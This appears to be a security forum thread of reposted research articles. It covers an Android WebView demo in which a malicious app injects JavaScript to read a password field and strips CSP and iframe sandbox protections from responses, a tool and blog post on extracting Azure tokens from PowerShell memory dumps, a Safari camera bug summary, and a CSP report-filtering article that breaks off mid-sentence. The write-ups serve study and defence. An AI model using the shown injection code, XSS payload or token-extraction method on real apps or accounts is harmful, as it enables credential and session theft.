clicking on the Submit button also displays the content of the password field as a toast message on BullyGiant. This proves how the underlying app may be able to sniff any data (sensitive or otherwise) from the page loaded in it's webview. Under the BullyGiant hood The juice of why BullyGiant was able to sniff password field out from the webview is because it is in total control of it's own webview & hence can change the properties of the webview, listen to events etc. That is exactly what it is doing. It is enabling javascript on it's webview & then it is listening for onPageFinished event Snippet from BullyGiant: ... final WebView mywebview = (WebView) findViewById(R.id.webView); mywebview.clearCache(true); mywebview.loadUrl("http://192.168.1.38:31337/home"); mywebview.getSettings().setJavaScriptEnabled(true); mywebview.setWebChromeClient(new WebChromeClient()); mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy"); mywebview.setWebViewClient(new WebViewClient(){ @Override public void onPageFinished(WebView view, String url) {...} ... Note that there is addJavascriptInterface as well. This is what many blogs (quoted in the beginning of this blog) talk about where the loaded web page can potentially be harmful to the underlying app. In our use case however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant could read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where the addJavascriptInterface is used) & having it displayed as a toast message. The other important bit in the BullyGiant code base is the over ridden onPageFinished() : ... super.onPageFinished(view, url); mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);"); ... That's where the javascript to read the password filed from the DOM is injected into the page loaded inside the webview. The story line continued... AppAwesome came about with the below solutions to prevent the web page from being read by the underlying app: Suggestion #1: Use CSP Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the iframe Suggestion #2: Use Iframe Sandbox Load the sensitive page inside of an iframe on the main page in the webview. Use iframe sandbox to restrict any interactions between the parent window/page & the iframe content. CSP is a mechanism to prevent execution of untrusted javascript inside a web page. While the sandbox attribute of iframe is a way to tighten the controls of the page within an iframe. It's very well explained in many resources like here. With all the above restrictions imposed, our goal now would be to see if BullyGiant can still access the AppAwesome page loaded inside the webview or not. We would go about analyzing how each of the suggested solutions work in a normal browser & in a webview & how could BullyGiant access the loaded pages if at all. Exploring CSP With Inline JS Apps used in this section: AppAwesome BullyGiant Before moving on to the demo of CSP implementation & it's effect/s on Android Webview, let's look at how a non-CSP page behaves in the normal (non-webview) browser & a webview. To demo this we have added an inline JS that would alert 1 on clicking of the submit button before proceeding to the success checkout page. AppAwesome code snippet: <!DOCTYPE HTML> ... <script type="text/javascript"> function f(){ alert(1); } </script> ... <input type="submit" value="Submit" name="submit" name="submit" onclick="f();"> ... </html> AppAwesome when accessed from the browser & when Submit button is clicked: Vanilla AppAwesome Page - Inline JS => Firefox 74.0 AppAwesome when accessed from BullyGiant app: Vanilla AppAwesome Page - Inline JS => Android Webview The above suggests that so far there is no change in how the page is treated by the 2 environments. Now let's check the change in behavior (if at all) when CSP headers are implemented. With CSP Implemented Apps used in this section: AppAwesome BullyGiant Browser A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) with what they are intended for. AppAwesome when accessed from a browser: CSP AppAwesome page - Inline JS => Firefox 74.0 Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser. Response headers from AppAwesome: CSP AppAwesome page - Inline JS => Firefox 74.0 Android Webview AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0: (Firefox was not chosen for remote debugging because I was lazy to set up remote debugging on Firefox. Firefox set up on the AVD was required too as per this from the FF settings page. Also further down for all the demos we use adb logs instead of remote debugging sessions to show browser console messages) On Google Chrome 80.0 Hence, we see that CSP does prevent execution of inline JS inside android webview, very much like a normal browser does. Exploring CSP With Injected JS Apps used in this section: AppAwesome AppAwesome (with XSS-Auditor disabled) BullyGiant (without XSS payload) BullyGiant (with XSS payload) AppAwesome has been made deliberately vulnerable to a reflected XSS by adding a query parameter, name, to the home page. This param is vulnerable to reflected XSS. Also, all inline JS has been removed from this page to further emphasize on CSP's impact on injected JS. AppAwesome when accessed from the browser while the name query parameter's value is John Doe: On Google Chrome 80.0 Now, for the sake of the demo, we would exploit the XSS vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1" XSS exploit payload <body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script> AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter): Vanilla AppAwesome Page - Exploited XSS => Firefox AppAwesome when accessed from BullyGiant, without exploiting the XSS: Vanilla AppAwesome Page - Vulnerable param => Android Webview AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above, however, contrary to the script injection that was successful in case of a normal browser, this time clicking on the Submit button didn't really execute the payload at all. We were instead taken directly to the checkout page. Adb logs however did produce an interesting message as shown below: Vanilla AppAwesome Page - Exploited XSS => Android Webview The adb log messages is: 03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9) So without even any explicit protection mechanism/s (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called XSS Auditor. This however has nothing to do with our use case. Moreover, it hinders with our demo as well. Hence, for now, for the sake of this demo, we would make AppAwesome return X-XSS-Protection HTTP header, as below, to take care of this issue. X-XSS-Protection: 0 Note: As an auxiliary, XSS Auditor would also be accounted for a bypass towards the end of the blog AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS: Vanilla AppAwesome Page - Exploited XSS => Android Webview Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled). Note: If the victim is the page getting loaded inside webview, it makes absolute sense that it's backend would never ever return any HTTP headers, like the above, that possibly weakens the security of the page itself. We will see why this is irrelevant further down. The other thing to note is that there was a subtle difference between how the payloads were injected in the vulnerable parameter in both the cases, the browser & the webview. And it is important to take note of it because it highlights the very premise of this blog post. In case of the browser, the attacker is an external party, who could send the JS payload to be able to exploit the vulnerable name parameter. Whereas in case of the android webview, the underlying app itself is the malicious actor & hence it is injecting the JS payload in the vulnerable name parameter before loading the page in it's own webview. This difference would be more prominent when we analyze further cases & how the malicious app leverages it's capabilities to exploit the page loaded in the webview. With CSP Implemented Apps used in this section: AppAwesome BullyGiant (with XSS payload) BullyGiant (with CSP bypass) BullyGiant (with CSP bypass reading the password field) Browser With the appropriate CSP headers in place, inline JS does not work in browsers as we saw above. What would happen if javascript is injected in the page that has CSP headers? Would it still have CSP violation errors? AppAwesome, with vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier): CSP AppAwesome Page - Exploited XSS => Firefox The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside Android Webview? AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview: CSP AppAwesome Page - Exploited XSS => Android Webview The same adb log is produced confirming that CSP works well in case of even injected javascript payload inside a webview. Note: In the CSP related examples above (browser or webview) note that CSP kicks in before the page actually gets loaded. With the above note, some interrelated questions that arise are: What would happen if BullyGiant wanted to access the contents of the page after it get successfully loaded? Could it add javascript to the already loaded page, as if this were being done locally? Would CSP still interfere? Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant could pretty much do whatever it wants with the loaded page's contents. So instead of injecting the javascript payload in the vulnerable parameter, as in the above example, BullyGiant may choose to instead inject it directly in the page itself after the page is loaded, without having the need to actually exploit the vulnerable name parameter at all. AppAwesome when accessed from BullyGiant that implements the above trick to achieve JS execution despite CSP: CSP AppAwesome Page - Exploited XSS => Android Webview The logs still show the below message: 03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution. 03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. BullyApp still injected XSS payload in the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that. Code snippet from BullyGiant that does the trick: ... mywebview.setWebViewClient(new WebViewClient(){ @Override public void onPageFinished(WebView view, String url) { super.onPageFinished(view, url); mywebview.loadUrl( "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);" ); } }); ... The above PoC shows execution of simple JS payload that just pops up an alert box. Any other more complex JS could be executed as well, like reading the contents of the password field on the page using the below payload var secret = document.getElementById("password").value; alert(secret); AppAwesome when accessed from BullyGiant that attempts to read the password field using the above payload: CSP AppAwesome Page - Exploited XSS => Android Webview So the questions above get answered. Also, it is indicative of an even more interesting question now: Since BullyApp is in total control of the webview & thus the page loaded within it, would it also be able to modify the whole HTTP response itself ? We will tackle the above question with yet another example. In fact, this time we would talk about the second suggestion around iframe sandbox and see if the answer to the above question could be demoed with that. Also, we had left out the whole X-XSS-Protection header thing for later. That part will also get covered with the following experiments. Iframe sandbox attribute Apps used in this section: AppAwesome Backend (without CSP & with iframe sandbox) AppAwesome Backend (without CSP & with iframe sandbox relaxed) BullyGiant AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes sandbox="allow-scripts allow-top-navigation allow-forms allow-popups" when loaded in the browser: AppAwesome Page - Iframe Sandbox => Browser The child page has the form which when submitted displays the password on the checkout page inside the iframe as: AppAwesome Page - Iframe Sandbox => Browser The Access button tries to read the password displayed inside iframe by reading the DOM of the page loaded in the iframe using the below JS ... <script type="text/javascript"> function accessIframe() { document.getElementById('myIframe').style.background = "green" alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText); } </script> ... Note that even in the absence of CSP headers clicking the Access button gives: AppAwesome Page - Iframe Sandbox => Browser The console message is: TypeError: document.getElementById(...).contentDocument is null This happens because of the iframe's sandbox attribute. The iframe sandbox can relaxed by using: <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups"> AppAwesome, with relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value: AppAwesome Page - Iframe Sandbox => Browser Also, just a side note, using the below would have also relaxed the sandbox to the exact same effect as has also been mentioned here: <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups"> Repeating the same experiment on android webview again produces the exact same results. AppAwesome, with relaxed iframe sandbox attribute when accessed from BullyGiant AppAwesome Page - Iframe Sandbox Relaxed=> Android Webview AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes sandbox="allow-scripts allow-top-navigation allow-forms allow-popups" when accessed from BullyGiant: AppAwesome Page - Iframe Sandbox => Android Webview The error message in the console is: 03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337". The frame being accessed is sandboxed and lacks the "allow-same-origin" flag. Now if BullyGiant were to bypass the above restriction, like it did in the case of CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded. Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now ! But instead of doing that what if BullyApp were to take an even simpler approach to bypassing everything once & for all? Since the webview is under the total control fo BullyGiant could it not intercept the response before rendering it on the webview and remove all the trouble making headers altogether? Manipulation of the HTTP response Apps used in this section: AppAwesome Backend (with all protection mechanisms in place) BullyGiant (that bypasses all the above mechanisms) BullyGiant app with a toast Let's make this case the most secure out of all the previous ones. So this time the AppAwesome implements all secure mechanisms on the page. Below is a list of such changes: It uses CSP => so that no unwanted JS (inline or injected) could be executed. It uses strict iframe sandbox attributes => so that the parent page can not access the contents of the iframe despite them being from the same domain. It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all. It does not have the Access button on the DOM with the inline JS => again something that we had used in few of our (most recent) previous examples for the sake of our demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe. AppAwesome when accessed from the browser: AppAwesome Page - FullBlown => Browser Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or the supporting inline JS, no X-XSS-Protection header & the strict iframe sandbox attribute is present as well. BullyGiant handles all of the above trouble makers by handling everything before any response is rendered onto the webview at all, AppAwesome 0 BullyGiant 1 ! AppAwesome when accessed from BullyGiant: AppAwesome Page - FullBlown => Android Webview Notice that the X-XSS-Protection: 0 header has been added ! The CSP header is no longer present ! And there's (the old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives: AppAwesome Page - FullBlown => Android Webview Code snippet from BullyGiant that does all the above trick: ... class ChangeResponse implements Interceptor { @Override public Response intercept(Interceptor.Chain chain) throws IOException { Response originalResponse = chain.proceed(chain.request()); String responseString = originalResponse.body().string(); Document doc = Jsoup.parse(responseString); doc.getElementById("myIframe").removeAttr("sandbox"); MediaType contentType = originalResponse.body().contentType(); ResponseBody body = ResponseBody.create(doc.toString(), contentType); return originalResponse.newBuilder() .body(body) .removeHeader("Content-Security-Policy") .header("X-XSS-Protection", "0") .build(); } }; ... ... private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) { try { final OkHttpClient client = new OkHttpClient.Builder() .addInterceptor(new LoggingInterceptor()) .addInterceptor(new ChangeResponse()) .build(); final Call call = client.newCall(new Request.Builder() .url(url) .build() ); final Response response = call.execute(); return new WebResourceResponse("text/html", "utf-8", response.body().byteStream() ); } catch (Exception e) { return null; // return response for bad request } } ... ... mywebview.setWebViewClient(new WebViewClient(){ @SuppressWarnings("deprecation") // From API 21 we should use another overload @Override public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) { return handleRequestViaOkHttp(url); } ... What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all the HTTP requests & response from that point on, before finally returning back the modified HTTP response back to the webview. Ending note: Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside webview. This was demoed using JS alerts on the page itself. The content read from the webview could actually also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked over to BullyGiant. AppAwesome when accessed from BullyGiant: AppAwesome Page - FullBlown => Android Webview - Raising a toast! Conclusion Theoretically since the webview is under total control of the underlying android app, it is wise to not share any sensitive data on the page getting loaded inside the webview. Collected on the way git worktrees what are git tags & how to maintain different versions using tags creating git tags checking out git tags pushing git tags tags can be viewed simply with git tag git tags can not be committed to => For any changes to a tag, commit the changes on the or a new branch and then make a tag out of it. Delete the olde tag after that if you want deleting a branch local & remote rename a branch local & remote adding chrome console messages to adb logs chrome's remote debugging feature Sursa: http://www.nuckingfoob.me/android-webview-csp-iframe-sandbox-bypass/index.html
-
- 1
-
-
AzureTokenExtractor Extracts Azure authentication tokens from PowerShell process minidumps. More information on Azure authentication tokens and the process for using this tool, check out the corresponding blog post at https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/. Usage USAGE: python3 azure-token-extractory.py [OPTIONS] OPTIONS: -d, --dump Target minidump file -o, --outfile File to save extracted Azure context Sursa: https://github.com/LaresLLC/AzureTokenExtractor
-
Hunting Azure Admins for Vertical Escalation: Part 2 RJ McDown April 2, 2020 No Comments This post is part 2 in the Hunting Azure Admins for Vertical Escalation series. Part 1 of this series detailed the usage and functionality of Azure authentication tokens, file locations that cache the tokens during a user session (“%USERPROFILE%\.Azure\TokenCache.dat”), methods for locating user exported Azure context files containing tokens, and leveraging them to bypass password authentication, as well as, multi-factor authentication. This blog post will focus on methodology to extract Azure authentication tokens when the end-user is disconnected and hasn’t exported an Azure context file. Disconnected Azure PowerShell Sessions When a user connects to Azure from PowerShell, a TokenCache.dat file is created and populated with the user’s Azure authentication token. This is detailed at great lengths in Part 1. However, if the user disconnected their Azure session, the TokenCache.dat file is stripped of the token. So, obtaining an Azure cached token from the TokenCache.dat file requires an active logged-in session. So, what can be done in a scenario where the Azure PowerShell session is disconnected, and the user hasn’t saved an Azure context file to disk? PowerShell Process Memory Thinking about traditional Windows credential theft and lateral movement brought to mind the LSASS.exe process and Mimikatz. In short, Windows has historically stored hashed and cleartext account credentials in the LSASS.exe process memory space and penetration testers have leveraged tools like Mimikatz to extract those credentials. This has gone on for years and has forced Microsoft into developing new security controls around the storage and access of credentials in Windows. On newer Windows systems, you will likely only extract hashed credentials from accounts that are actively logged onto the machine, as Windows has improved its scrubbing of credentials from memory after a user disconnects. This leads to the PowerShell process and identifying information it maintains in memory. Let’s start by dumping the PowerShell process memory to disk in minidump format. Although we used a custom tool, SnappyKatz, to dump the PowerShell process memory other publicly available tools exist that can do this, such as, ProcDump from the Sysinternals Suite. We can then leverage our favorite hex editor to explore the contents of the dump. Referring back to the contents inside the TokenCache.dat file, we can quickly search for keywords to locate the Azure context Json in the dump. This is great, but the required CacheData field that would contain the base64 encoded cached token was empty. At first, it was thought the field was empty because the session had been disconnected and due diligence had been done on the part of Microsoft to remove sensitive information from memory. In true Microsoft fashion, the missing cached token data was identified, in full, at a different offset in the dump. We had now located the two pieces of information needed to reconstruct an Azure context file. To create the context file, we saved the JSON context data found at the first location to a file and populated the CacheData field with the base64 encoded token cache located at the second location. Automating Extraction In order to save a tremendous amount of time on engagements, we created a tool in Python that automates the extraction of required data and properly exports it to a usable Azure context JSON file. This tool produces the following Azure context JSON output: The last step is to import the extracted Azure context file and see if we are able to access Azure. As we can see, Azure access has been obtained, leveraging disconnected session tokens extracted from PowerShell process memory. To make it easy to replicate our findings, we’ve published the AzureTokenExtractor tool to extract Azure authentication tokens from PowerShell process minidumps. We hope you have enjoyed this blog post. Keep checking back as we add more research, tool, and technique-related posts in the future! Sursa: https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2
-
iPhone Camera Hack I discovered a vulnerability in Safari that allowed unauthorized websites to access your camera on iOS and macOS Imagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed. This vulnerability allowed malicious websites to masquerade as trusted websites when viewed on Desktop Safari (like on Mac computers) or Mobile Safari (like on iPhones or iPads). Hackers could then use their fraudulent identity to invade users' privacy. This worked because Apple lets users permanently save their security settings on a per-website basis. If the malicious website wanted camera access, all it had to do was masquerade as a trusted video-conferencing website such as Skype or Zoom. Is an ad banner watching you? I posted the technical details of how I found this bug in a lengthy walkthrough here. My research uncovered seven zero-day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787), three of which were used in the kill chain to access the camera. Put simply - the bug tricked Apple into thinking a malicious website was actually a trusted one. It did this by exploiting a series of flaws in how Safari was parsing URIs, managing web origins, and initializing secure contexts. If a malicious website strung these issues together, it could use JavaScript to directly access the victim's webcam without asking for permission. Any JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack. I reported this bug to Apple in accordance with the Security Bounty Program rules and used BugPoC to give them a live demo. Apple considered this exploit to fall into the "Network Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data" category and awarded me $75,000. The below screen recording shows what this attack would look like if clicked from Twitter. * victim in screen recording has previously trusted skype.com Sursa: https://www.ryanpickren.com/webcam-hacking-overview
-
Filtering the Crap, Content Security Policy (CSP) Reports 13 days ago Stuart Larsen #article It's pretty well accepted that if you collect Content Security Policy (CSP) violation reports, you're going to have to filter through a lot of confusing and unactionable reports. But it's not as bad as it used to be. Things are way better than they were six years ago when I first started down the CSP path with Caspr. Browsers and other User Agents are way more thoughtful on what and when they report. And new additions to CSP such as "script-sample" have made filtering reports pretty manageable. This article will give a quick background, and then cover some techniques that can be used to filter Content Security Policy reports. What is a Content Security Policy report? Why filter Content Security Policy reports? Filtering Techniques Blacklists Malformed Reports Bots Script-Sample Browser Age line-number / column-number analysis SourceFile / DocumentURI Other Ideas Similar Reports From Newer Browser Versions 'Crowd Sourced' Labeling Conclusion What is a Content Security Policy report? If you're new to Content Security Policy, I'd recommend checking out An Introduction To Content Security Policy first. Content Security Policy has a nifty feature called report-uri. When report-uri is enabled the browser will send a JSON blob whenever the browser detects a violation from the CSP. (For more info: An Introduction to report-uri). That JSON blob is the report. Here's a random violation report from my personal website https://c0nrad.io: { Report: Violation report from c0nrad.io on an inline style The report has a number of tasty details: blocked-uri: inline. The blocked-uri was an 'inline' resource violated-directive: style-src-elem. The violated directive was a CSS style element (it means <style> block as opposed to "style=" attr (attribute) on an HTML element) source-file / line-number: https://c0nrad.io/ / 8. The inline resource came from file https://c0nrad.io on line 8. If you view-source of https://c0nrad.io, it's still there script-sample: .something { width: 100%} 'The first 40 characters are .something { width :100%}. These reports are a miracle when getting started with CSP. You can use them to quickly determine where your policy is lacking. You can even use it to build new policies from scratch. It's actually how tools like CSP Generator automatically build new content security policies. Just by parsing these reports. Why filter Content Security Policy reports? If the violation reports are so amazing, why do we want to filter them? It seems a little counter intuitive at first, but the sad reality is that not all reports are created equal. Here's some of the inline reports that Csper's has received on it's own policy. Only three of them are from a real inline script in Csper (which I purposely injected): Figure: Sample violation reports generated by Content Security Policy For more fun, I highly recommend checking out this amazing list of fun CSP reports: csp-wtf What's frustrating is that a large percentage of reports received from CSP are unactionable. They're not really related to the website. These "unactionable" can come from a lot of different places. The most common is extensions and addons. There's also ads, content injected from ISPs, malware, corporate proxies, custom user scripts, browser quirks, and a sprinkle of serious "wtf" reports. Filtering Techniques The goal of filtering is to remove the unactionable reports, so that you're only left with reports that should be looked into. But of course you don't want to filter too much such that you lose reports that really should of been analyzed (such as an XSS on your website). They are somewhat listed in order of importance+ease+reliability. Blacklists The easiest way to filter out a huge number of reports by applying some simple blacklisting rules. I think everyone either directly or indirectly has taken a page from Neil Matatall's/Twitter's book back in 2014: https://matatall.com/csp/twitter/2014/07/25/twitters-csp-report-collector-design.html Some more lists: https://dropbox.tech/security/on-csp-reporting-and-filtering https://github.com/getsentry/sentry/blob/master/src/sentry/interfaces/security.py#L20 https://github.com/jacobbednarz/go-csp-collector/blob/b3a8ff39e3835b3b9452898beb20677cee680dd0/csp_collector.go#L59 Depending on your use-case, it maybe be better to classify them, and then selectively filter out those classifications later (just incase you actually need the reports). Some buckets I found to work well are 'extension', 'unactionable'. But this technique alone cuts out ~50% of the weird reports. Malformed Reports Another easy way to filter reports is to make sure they have all the necessary fields (and that fields like effective-directive are actually a real directive). If it's missing some fields it's probably not worth time investigating. It's probably a very old or incomplete user agent. All the fields can be found in the CPS3 spec. { You could argue that maybe the users being XSS'ed are on a very old browser that doesn't correctly report on all fields, and so if you filter them out you're going to miss the XSS that needs to be patched. Which is definitely fair. But with browser auto-updating I think/hope most people are on a decently recent browser. And also (this should not be a full excuse not to care), but people on very outdated browsers probably have a large number of other browser problems to worry about. And also if multiple users are being XSS's, the majority of them are probably on a competent user agent that will report all the fields, so it will be picked up. It comes down to how much time/resources an organization has to dedicate to CSP. Something is better than nothing. And this case, this something can save you hours, for a pretty small chance of something falling through the cracks. I recommend adding a label to reports that are missing important fields (or using egregious values) to be categorized as 'malformed', and just kept to the side so they can be skimmed every once in awhile. Bots Another easy way to filter out 'unactionable' reports is to check if the User Agents belongs to a Bot. A number of web scrapers inject javascript into the pages they are analyzing. (The bots also have CSP enabled). Which seams silly at first, but they're probably just using headless chrome or something. Some example user agents: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/60.0.3112.50 Safari/537.36 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/61.0.3163.59 Safari/537.36 Prerender (+https://github.com/prerender/prerender) Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/) Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/) Since these UserAgents inject their own javascript not related to the website, it's not worth the time investigating them. Script-Sample If report-sample is enabled (which I highly recommend it be enabled), you can start filtering out reports on the first 40 characters in the script-sample field. A good starting point is the csp-wtf list. A quick note of caution though for websites running in 'Content-Security-Policy-Report-Only'. If you automatically filter out anything that matches these script-samples, an attacker could attempt to use an XSS that starts with one of those strings to avoid detection. If it's a DOM based XSS it'll be very hard to determine what is an injection vs what is a DOM based XSS (more on that later). Browser Age One filtering technique that Csper started supporting this week is filtering on Browser Age. Older browsers (and less common browsers) have some fun CSP quirks (and sadly probably more malware, toolbars, etc, which all cause unactionable reports), so if you're short on resources, they reports should probably be looked at less. So when a report is received, you take the User Agent + Version, look up the release date of that User Agent, and if it's older than some time period (2 years) label it as an older user agent. This cuts out like 15% of the reports. The same argument still holds of "what if the XSS victim is using an old browser". Again I think that it is up to the website's security maturity and available resources to determine what an appropriate level of effort is. But for the average website, giving less attention to the >2yrs old browsers but giving more attention to the rest of the reports, instead of being over flooded by reports and doing nothing, is infinitely better. The reports are still there for those who want to look at them. line-number / column-number analysis Modern browsers make a good attempt to add Line-Number/Column-Number to the violation reports. (The PR for chrome). So when there's a resource that doesn't have a line-number/column-number, it's a good cause for an eyebrow raise. A lot of reports also use "1' or "0" as the line number. These can also be a great signal for something odd. I found that usually a line number of 0/1 signifies that the resources was "injected" after the fact. (As in it was not part of the original HTML). This could be things like SPAS (angular/react) injecting resources, or browsers injecting content scripts, or a DOM based XSS. Unfortunately (at least for modern chrome), I couldn't find a way to determine the difference between a DOM based XSS, and something injected by a browser script. For example here's a report of a DOM based XSS I injected myself through an angular innerHTML. It looks pretty much the same as a lot of extension injections with a line-number of 1: { But it is still interesting when a report has a line-number of 1. So inline reports can either be split into categories of "inline" or "injected". The injected will contain most of the browser stuff, but could also contain DOM based XSS's, so still needs to be looked at. I hope in the future that source-file will better accurately reflect where the javascript came from, and we can filter out all extension stuff with great ease. SourceFile / DocumentURI In a somewhat related vein, stored or reflected XSS's should have a matching sourcefile/documenturi (obviously not the case for DOM or more exotic XSS's). In some of the odd reports the source file will be from something external (such as a script from Google Translate). If you're specifically looking to detect a stored/reflected XSS, a mismatch can be a nice indication that maybe the report isn't as useful. Somewhat related, Firefox also doesn't include sourcefile on eval's from extensions, which can help reduce eval noise. (They can be placed in the extension bucket). Other Ideas Similar Reports From Newer Browser Versions Browsers are getting way better at fully specifying what content came from an extension. For example below it's pretty obvious that this report is from an extension (thanks to the source-file starting with moz-extension). This report came from a Useragent with Firefox/Windows/Desktop released 22 days ago. { The next report most likely came from the same extension, but from the report it's not obvious where the report came from. This UserAgent is Firefox/Windows/Desktop but released 9 months ago. { "csp-report": { "blocked-uri": "inline", "column-number": 1, "document-uri": "https://csper.io/blog/other-csp-security", "line-number": 1, "original-policy": "default-src 'self'; connect-src 'self' https://*.hotjar.com https://*.hotjar.io https://api.hubspot.com https://forms.hubspot.com https://rs.fullstory.com https://stats.g.doubleclick.net https://www.google-analytics.com wss://*.hotjar.com; font-src 'self' data: https://script.hotjar.com; frame-src 'self' https://app.hubspot.com https://js.stripe.com https://vars.hotjar.com https://www.youtube.com; img-src 'self' data: https:; object-src 'none'; script-src 'report-sample' 'self' http://js.hs-analytics.net/analytics/ https://edge.fullstory.com/s/fs.js https://js.hs-analytics.net/analytics/ https://js.hs-scripts.com/ https://js.hscollectedforms.net/collectedforms.js https://js.stripe.com/v3/ https://js.usemessages.com/conversations-embed.js https://script.hotjar.com https://static.hotjar.com https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/js; style-src 'report-sample' 'self' 'unsafe-inline'; base-uri 'self'; report-uri https://csper-prod.endpoint.csper.io/", "referrer": "", "script-sample": "(() => {\n try {\n // co…", "source-file": "https://csper.io/blog/other-csp-security", "violated-directive": "script-src" } } It's not perfect, but it may be possible to group similar reports together and perform the analysis on the latest user agent. But you have to be careful that you don't aggressively group reports together to the point where an attacker could attempt to smuggle XXS's that start with (() => {\n try {\n // co to avoid detection on report-only deployments. Hopefully as everyone moves to very recent browsers we can just filter on the source-file. There was also a little chatter about adding the sha256-hash to the report, that would also make this infinitely more feasible (but, people would need to be on more recent versions of their browsers to send the new sha256, and by that point we'll already have the moz-extension indicator in the source-file). 'Crowd Sourced' Labeling Another idea that I've been mulling over is 'Crowd Sourced' labeling. What if people could mark reports as "unactionable" (somewhat like the csp-wtf list)? Or "this report doesn't apply to my project". These reports be aggregated and then displayed to other users of a report-uri endpoint as "other users have marked this report as unactionable". For people just getting started with CSP this could be nice validation to ignore a report. Or specifically if there's XSS's with a known payload, people could mark as "this was a real XSS", and other people get that indication when there's a similar report in their project. Due to my privacy/abuse concerns this idea has 